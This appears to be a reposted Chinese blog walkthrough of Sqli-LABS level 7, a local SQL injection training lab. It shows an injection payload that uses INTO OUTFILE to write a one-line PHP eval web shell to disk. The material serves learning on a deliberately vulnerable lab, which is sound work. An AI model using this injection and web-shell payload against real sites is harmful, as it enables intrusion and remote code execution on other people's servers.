码迷,mamicode.com
首页 > 数据库 > 详细

Sqli-LABS通关笔录-7[文件写入函数Outfile]

时间:2016-11-29 06:20:53      阅读:306      评论:0      收藏:0      [点我收藏+]

标签:index.php   源代码   127.0.0.1   dex   sql   com   使用   class   union   

该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用。

 

通过源代码我们很容易的写出了payload。倘若我们一个个去尝试的话,说实话,不容易。

http://127.0.0.1/sql/Less-7/index.php?id=1‘)) and 1=1--+

技术分享

Payload:

 http://127.0.0.1/sql/Less-7/index.php?id=1‘)) union select 1,‘<?php eval($_POST[cmd])?>‘,3 into outfile ‘H://zhenxishaonianshi.txt‘--+

技术分享

 

虽然提示了语法错误。但是我们看看。在H盘是真实的存在的。

 

技术分享

 

 

 

THE END


 

Sqli-LABS通关笔录-7[文件写入函数Outfile]

标签:index.php   源代码   127.0.0.1   dex   sql   com   使用   class   union   

原文地址:http://www.cnblogs.com/xishaonian/p/6111757.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!